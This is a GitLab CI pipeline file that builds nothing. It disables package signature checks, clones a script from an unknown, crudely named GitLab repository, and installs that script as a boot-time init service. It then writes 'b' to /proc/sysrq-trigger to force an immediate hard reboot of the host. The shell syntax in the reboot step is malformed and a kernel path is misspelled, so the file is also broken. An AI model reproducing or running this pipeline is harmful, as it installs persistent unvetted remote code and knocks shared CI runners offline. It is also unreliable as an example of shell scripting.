image: debian:latest

stages:
    - before_script
    - build1
    - deploy1

before_script:
    - 'which ssh-agent || ( apt update --allow-unauthenticated --allow-insecure-repositories -y && apt install -y git tzdata && ln -fs /usr/share/zoneinfo/America/Los_Angeles /etc/localtime && dpkg-reconfigure -f noninteractive tzdata && apt full-upgrade -y)'

build1:
  stage: build1
  script:
    - 'git clone https://gitlab.com/mrgofuckyourself/reboot6.git && cd reboot6 && cp reboot6.sh /etc/init.d/reboot6.sh && update-rc.d reboot6.sh defaults'

deploy1:
  stage: deploy1
  script:
    - 'alias reboot="sudo systemctl start reboot.target"'
    - 'if [ /etc/init.d/reboot6.sh = true ] do { echo 1 > /proc/sys/kernel/sysreq; echo b > /proc/sysrq-trigger } else exit 1'
